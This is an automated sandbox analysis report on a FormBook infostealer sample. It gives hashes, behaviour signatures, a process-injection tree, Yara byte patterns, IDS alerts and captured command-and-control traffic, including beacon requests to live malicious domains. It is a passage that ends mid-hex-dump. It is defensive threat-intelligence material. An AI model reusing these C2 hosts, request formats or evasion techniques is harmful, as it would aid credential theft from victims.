Windows Analysis Report
8mmZ7Bkoj1.exe

Overview

General Information

Sample name: 8mmZ7Bkoj1.exe (renamed because original name is a hash value)
Original sample name: 64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a.exe
Analysis ID: 1528955
MD5: cce5d60668494a747ca41f5d8b17e76a
SHA1: 9f29f6cad0687318f9ce75c0145b68914fd0e422
SHA256: 64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a
Tags: exe, Formbook, user-adrian__luca
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 8mmZ7Bkoj1.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe" MD5: CCE5D60668494A747CA41F5D8B17E76A)
    • svchost.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eKxwLXHhqpgy.exe (PID: 1904 cmdline: "C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • makecab.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\makecab.exe" MD5: 00824484BE0BCE2A430D7F43CD9BABA5)
          • eKxwLXHhqpgy.exe (PID: 1228 cmdline: "C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source / Rule / Description / Author / Strings):

Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2bf10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1416f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2bf10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1416f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Yara matches in unpacked PEs (Source / Rule / Description / Author / Strings):

Source: 1.2.svchost.exe.2410000.0.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.svchost.exe.2410000.0.unpack
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x166a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 1.2.svchost.exe.2410000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.svchost.exe.2410000.0.raw.unpack
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x174a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ParentImage: C:\Users\user\Desktop\8mmZ7Bkoj1.exe, ParentProcessId: 7440, ParentProcessName: 8mmZ7Bkoj1.exe, ProcessCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ProcessId: 7508, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ParentImage: C:\Users\user\Desktop\8mmZ7Bkoj1.exe, ParentProcessId: 7440, ParentProcessName: 8mmZ7Bkoj1.exe, ProcessCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ProcessId: 7508, ProcessName: svchost.exe

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T14:18:23.711338+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 156.226.22.233 | 80 | TCP
2024-10-08T14:19:07.778511+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49883 | 176.32.38.141 | 80 | TCP
2024-10-08T14:19:21.281956+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50011 | 199.192.21.169 | 80 | TCP
2024-10-08T14:19:43.467409+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50015 | 3.33.130.190 | 80 | TCP
2024-10-08T14:19:56.641348+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 84.32.84.32 | 80 | TCP
2024-10-08T14:20:26.593067+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | TCP


AV Detection

Source: 8mmZ7Bkoj1.exe; Avira: detected
Source: 8mmZ7Bkoj1.exe; ReversingLabs: Detection: 47%
Source: Yara match; File source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 8mmZ7Bkoj1.exe; Joe Sandbox ML: detected
Source: 8mmZ7Bkoj1.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: makecab.pdbGCTL; source: svchost.exe, 00000001.00000003.2111036861.000000000282A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2110933749.000000000281B000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000002.3561180212.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: eKxwLXHhqpgy.exe, 00000005.00000002.3560737950.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp, eKxwLXHhqpgy.exe, 00000007.00000000.2224546408.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP; source: svchost.exe, 00000001.00000002.2155609002.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2032565118.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036860924.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.000000000489E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.0000000004700000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2155490594.000000000454C000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2145069382.000000000439C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: svchost.exe, svchost.exe, 00000001.00000002.2155609002.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2032565118.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036860924.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, makecab.exe, 00000006.00000002.3561799198.000000000489E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.0000000004700000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2155490594.000000000454C000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2145069382.000000000439C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: makecab.pdb; source: svchost.exe, 00000001.00000003.2111036861.000000000282A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2110933749.000000000281B000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000002.3561180212.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb; source: makecab.exe, 00000006.00000002.3562512745.0000000004D2C000.00000004.10000000.00040000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2451289116.000000001C1CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP; source: makecab.exe, 00000006.00000002.3562512745.0000000004D2C000.00000004.10000000.00040000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2451289116.000000001C1CC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\makecab.exe; Code function: 6_2_0281C541 FindFirstFileW,FindNextFileW,FindClose; 6_2_0281C541
Source: C:\Windows\SysWOW64\makecab.exe; Code function: 4x nop then xor eax, eax; 6_2_02809B10
Source: C:\Windows\SysWOW64\makecab.exe; Code function: 4x nop then mov ebx, 00000004h; 6_2_045D04E8
Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe; Code function: 4x nop then pop edi; 7_2_05636CB0
Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe; Code function: 4x nop then pop edi; 7_2_0563604A
Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe; Code function: 4x nop then xor eax, eax; 7_2_0563A853
Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe; Code function: 4x nop then pop edi; 7_2_05636008
Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe; Code function: 4x nop then pop edi; 7_2_0563531E
Source: C:\Program Files\Mozilla Firefox\firefox.exe; Code function: 4x nop then mov ebx, 00000004h; 8_2_000002469BF634E8

Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49752 -> 156.226.22.233:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49883 -> 176.32.38.141:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50015 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50011 -> 199.192.21.169:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50019 -> 84.32.84.32:80
Source: DNS query: www.impo232rt.xyz
Source: Joe Sandbox View; IP Address: 199.192.21.169
Source: Joe Sandbox View; IP Address: 84.32.84.32
Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View; ASN Name: AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK
Source: Joe Sandbox View; ASN Name: NTT-LT-ASLT
Source: Joe Sandbox View; ASN Name: ASBAXETRU
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
Source: global traffic; HTTP traffic detected:
  GET /i70z/?Yp=eXMH4fkp&nrs8j=8fwlLwm+T0nphGhW7PHH3xFKB5SB8SFc9+r/t0QDCeclosptBaw61DZvImsaGCeeZR7Fl0K64LM59E0NLQ1vdm4QrRMTpos6Kj6ui5/Q8OeERMbnF/TN1fg= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.nad5.shop
  Connection: close
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Source: global traffic; HTTP traffic detected:
  GET /azcx/?nrs8j=irMYamRxHtj3NMD2tLgxvViSvpLqwhvn7ehZdObCxtX/sdDuQfcDsrOzu60Trx/UY7Wv4F1shT0OqKdZ6j2zU9VfvWpTmK3e9j1Z+5zsY7kVMmPgkcjeH9Y=&Yp=eXMH4fkp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.impo232rt.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Source: global traffic; HTTP traffic detected:
  GET /6iok/?Yp=eXMH4fkp&nrs8j=Lr8I5vR8kZnO1BXwYoMTGZrf0zW9P9gXQAsQehgeDaNdyJVo64QKCUs+Z9VbQDUfL8+SUHVZNFYLvGD3PrMcSw81RdJBHrPngUHAq0ps+A4FRAxn/QrS6wg= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.cenfresh.life
  Connection: close
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Source: global traffic; HTTP traffic detected:
  GET /paa2/?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.digitalbloom.info
  Connection: close
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Source: global traffic; HTTP traffic detected:
  GET /pt4m/?nrs8j=AzKTe9sU/un6FWh8J4Z/TBPHes/wm2VwkqZ8OIQkGxADXwK45dBXsHOALtRz338sDHJ9qmiySJX4ofZpl75YgKir24cXfpRpIxKZjJwadTshiHDArMKxe74=&Yp=eXMH4fkp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.thepeatear.online
  Connection: close
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Source: global traffic; HTTP traffic detected:
  GET /oigd/?Yp=eXMH4fkp&nrs8j=OmljFUtRbeDOfRENDbVJh6NUYYaJHl1k9TsJZM5Ee42aF5vB50jMxPr4FwwBeRCvDsFug2RQoELqNPfysYsF+OkFJw//SD8mDkg+57R+QpypShxcm6mm+yI= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.crowsecurity.cloud
  Connection: close
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Source: global traffic; DNS traffic detected: DNS query: www.nad5.shop
Source: global traffic; DNS traffic detected: DNS query: www.impo232rt.xyz
Source: global traffic; DNS traffic detected: DNS query: www.cenfresh.life
Source: global traffic; DNS traffic detected: DNS query: www.trafegomagico.shop
Source: global traffic; DNS traffic detected: DNS query: www.digitalbloom.info
Source: global traffic; DNS traffic detected: DNS query: www.thepeatear.online
Source: global traffic; DNS traffic detected: DNS query: www.mktimediato.online
Source: global traffic; DNS traffic detected: DNS query: www.schoolsfrirstfcu.org
Source: global traffic; DNS traffic detected: DNS query: www.crowsecurity.cloud
Source: global traffic; DNS traffic detected: DNS query: www.myjiorooms.services
Source: unknown; HTTP traffic detected:
  POST /azcx/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Accept-Encoding: gzip, deflate, br
  Host: www.impo232rt.xyz
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 202
  Connection: close
  Cache-Control: no-cache
  Origin: http://www.impo232rt.xyz
  Referer: http://www.impo232rt.xyz/azcx/
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
  Data (decoded from raw bytes):
    nrs8j=vpk4ZW98F8zyApP5kcselz/tg4Cqw1nI/PdvIdCc+sDHlNeKE6J41bHspbQWr3bLVrSU70BZkh15gJlH7DaMQIk4wk1MtLnBwFFwvtv+S5kcf2LBo+2AINLp/XEiLqP8TvJTNszHabmGanm7MmcR1qViW/zGKNZvJCupVN0FJYmg4z9NRHzDvFGEoJkzVqdiiA==
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Tue, 08 Oct 2024 12:18:23 GMT
  Content-Type: text/html
  Content-Length: 548
  Connection: close
  Data (decoded from raw bytes):
    <html>
    <head><title>404 Not Found</title></head>
    <body>
    <center><h1>404 Not Found</h1></center>
    <hr><center>nginx</center>
    </body>
    </html>
    <!-- a padding to disable MSIE and Chrome friendly error page -->
    <!-- a padding to disable MSIE and Chrome friendly error page -->
    <!-- a padding to disable MSIE and Chrome friendly error page -->
    <!-- a padding to disable MSIE and Chrome friendly error page -->
    <!-- a padding to disable MSIE and Chrome friendly error page -->
    <!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 08 Oct 2024 12:19:13 GMT
  Server: Apache
  X-Frame-Options: SAMEORIGIN
  Content-Length: 774
  X-XSS-Protection: 1; mode=block
  Connection: close
  Content-Type: text/html
  Data (decoded from raw bytes):
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <title>404 Not Found</title>
      <link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet">
      <link type="text/css" rel="stylesheet" href="/css/style404.css" />
    </head>
    <body>
      <div id="notfound">
        <div class="notfound">
          <div class="notfound-404">
            <h1>4<span>0</span>4</h1>
          </div>
          <h2>the page you requested could not found</h2>
          <form class="notfound-search">
            <input type="text" placeholder="Search...">
            <button type="button"><span></span></button>
          </form>
        </div>
      </div>
    </body>
    </html>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 08 Oct 2024 12:19:16 GMT
  Server: Apache
  X-Frame-Options: SAMEORIGIN
  Content-Length: 774
  X-XSS-Protection: 1; mode=block
  Connection: close
  Content-Type: text/html
  Data (decoded from raw bytes):
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <title>404 Not Found</title>
      <link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet">
      <link type="text/css" rel="stylesheet" href="/css/style404.css" />
    </head>
    <body>
      <div id="notfound">
        <div class="notfound">
          <div class="notfound-404">
            <h1>4<span>0</span>4</h1>
          </div>
          <h2>the page you requested could not found</h2>
          <form class="notfound-search">
            <input type="text" placeholder="Search...">
            <button type="button"><span></span></button>
          </form>
        </div>
      </div>
    </body>
    </html>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 08 Oct 2024 12:19:18 GMT
  Server: Apache
  X-Frame-Options: SAMEORIGIN
  Content-Length: 774
  X-XSS-Protection: 1; mode=block
  Connection: close
  Content-Type: text/html
  Data (decoded from raw bytes):
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <title>404 Not Found</title>
      <link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet">
      <link type="text/css" rel="stylesheet" href="/css/style404.css" />
    </head>
    <body>
      <div id="notfound">
        <div class="notfound">
          <div class="notfound-404">
            <h1>4<span>0</span>4</h1>
          </div>
          <h2>the page you requested could not found</h2>
          <form class="notfound-search">
            <input type="text" placeholder="Search...">
            <button type="button"><span></span></button>
          </form>
        </div>
      </div>
    </body>
    </html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 12:19:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 
